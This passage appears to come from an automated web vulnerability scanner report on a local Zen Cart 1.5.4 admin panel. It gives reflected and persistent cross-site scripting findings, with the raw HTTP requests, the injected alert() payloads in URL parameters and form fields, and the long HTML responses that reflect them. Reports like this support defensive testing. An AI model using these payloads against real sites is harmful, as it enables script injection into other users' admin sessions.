                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00<span class="errorText"><br />Warning: Does not show Quantity Box, Default to Qty 1</span></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/no_picture.gif" border="0" alt="admin" title=" admin " width="100" height="80" align="right" hspace="5" vspace="5">test        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14515090.17347)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Wednesday 30 December, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=&product_type=0&pID=325&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="6dead581bdfe002d6b2ac17b640835d1" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="6dead581bdfe002d6b2ac17b640835d1" /><input type="hidden" name="products_date_added" value="2015-12-30 23:01:06" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input type="hidden" name="master_categories_id" value="0" /><input type="hidden" name="products_discount_type" value="0" /><input type="hidden" name="products_discount_type_from" value="0" /><input type="hidden" name="products_price_sorter" value="0.0000" /><input type="hidden" name="products_status" value="0" /><input type="hidden" name="products_date_available" value="12/30/2015" /><input type="hidden" name="manufacturers_id" /><input type="hidden" name="product_is_free" value="0" /><input type="hidden" name="product_is_call" value="0" /><input type="hidden" name="products_priced_by_attribute" value="0" /><input type="hidden" name="products_tax_class_id" value="1" /><input type="hidden" name="products_price" value="12" /><input type="hidden" name="products_price_gross" value="12" /><input type="hidden" name="products_virtual" value="0" /><input type="hidden" name="product_is_always_free_shipping" value="2" /><input type="hidden" name="products_qty_box_status" value="0" /><input type="hidden" name="products_quantity_order_min" value="12" /><input type="hidden" name="products_quantity_order_max" value="12" /><input type="hidden" name="products_quantity_order_units" value="12" /><input type="hidden" name="products_quantity_mixed" value="0" /><input type="hidden" name="products_quantity" value="1222111" /><input type="hidden" name="products_model" value="testval" /><input type="hidden" name="products_previous_image" /><input type="hidden" name="img_dir" /><input type="hidden" name="image_delete" value="0" /><input type="hidden" name="overwrite" value="1" /><input type="hidden" name="products_image_manual" /><input type="hidden" name="products_weight" value="0" /><input type="hidden" name="products_sort_order" value="0" /><input type="hidden" name="products_name[1]" value="admin" /><input type="hidden" name="products_description[1]" value="test" /><input type="hidden" name="products_url[1]" value="&gt;&quot;&gt;&lt;script&gt;alert(14515090.17347)&lt;/script&gt;" /><input type="hidden" name="products_image" /><input type="image" src="includes/languages/english/images/buttons/button_back.gif" border="0" alt="Back" title=" Back " name="edit">&nbsp;&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update ">&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/categories.php?cPath=&pID=325"><img src="includes/languages/english/images/buttons/button_cancel.gif" border="0" alt="Cancel" title=" Cancel "></a>        </td>
      </tr>
    </table></form>
    </td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br />
</body>
</html>

Finding 3.45:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: GET: search
Injection value: x" onmousemove="alert(14514152.28327)
Detection value: x" onmousemove="alert(14514152.28327)

HTTP Request
GET /zen-cart/admin1/product.php?cPath=0&product_type=0&pID=209&action=new_product_preview&search=x" onmousemove="alert(14514152.28327)&vcheck=yes HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
X-Cenzic-Spider-Send-HeadRequest: true
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=0&product_type=0&pID=209&action=new_product_preview&search=test
Cookie: zenAdminID=silie6i71hqsgavjqushbv61o4


HTTP Response
HTTP/1.1 200 OK
Date: Tue, 29 Dec 2015 22:42:23 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript" src="includes/general.js"></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
if (typeof _editor_url == "string") HTMLArea.replaceAll();
 }
 // -->
</script>
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="init()">
<div id="spiffycalendar" class="text"></div>
<!-- header //-->
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
    <td align="right" class="main" valign="top">Your version of Zen Cart&reg; appears to be current.<br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      &nbsp;    </td>
    <td class="headerBarContent" align="center">
Tuesday 29 Dec 2015 10:42:24 PM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds25" border="0" alt="" width="100" height="80" align="right" hspace="5" vspace="5">        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 29 December, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=0&product_type=0&pID=209&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="52cfc6f49a1be964cd408c77646a82ba" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="products_name[1]" /><input type="hidden" name="products_description[1]" /><input type="hidden" name="products_url[1]" /><input type="hidden" name="products_image" value="3ds25" /><input type="hidden" name="search" value="x&quot; onmousemove=&quot;alert(14514152.28327)" /><input type="image" src="includes/languages/english/images/buttons/button_back.gif" border="0" alt="Back" title=" Back " name="edit">&nbsp;&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update ">&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/categories.php?cPath=0&pID=209&search=x" onmousemove="alert(14514152.28327)"><img src="includes/languages/english/images/buttons/button_cancel.gif" border="0" alt="Cancel" title=" Cancel "></a>        </td>
      </tr>
    </table></form>
    </td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br />
</body>
</html>

Finding 3.46: Persistent Cross-Site Scripting.

Current injection value: <!+XSS="><img+src=xx:x+onerror=alert(14514152.38347)//">

Injection URI: http://localhost:8081/zen-cart/admin1/categories.php?reset_editor=1&cID=0&cPath=0&pID=61c3p0z14514152.38317r2d2z&action=set_editor
Injected item: GET : pID
Injection value: <script>alert(14514152.38317)</script>


Reflection URI: http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=1&zID=1&action=insert_zone
Detection string: alert(14514152.38317)

HTTP Request
POST /zen-cart/admin1/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=1&zID=1&action=new_zone
Cookie: zenAdminID=silie6i71hqsgavjqushbv61o4
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

securityToken=52cfc6f49a1be964cd408c77646a82ba&geo_zone_name=admin&geo_zone_description=testval&x=0&y=0&<!+XSS="><img+src=xx:x+onerror=alert(14514152.38347)//">

HTTP Response
HTTP/1.1 200 OK
Date: Wed, 30 Dec 2015 00:13:23 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript" src="includes/general.js"></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
  }
  // -->
</script>
</head>
<body onLoad="init()">
<!-- header //-->
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
    <td align="right" class="main" valign="top"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zID=35&vcheck=yes"><img src="includes/languages/english/images/buttons/button_check_new_version.gif" border="0" alt="Check for Updates to Zen Cart" title=" Check for Updates to Zen Cart "></a><br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      &nbsp;    </td>
    <td class="headerBarContent" align="center">
Wednesday 30 Dec 2015 12:13:24 AM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
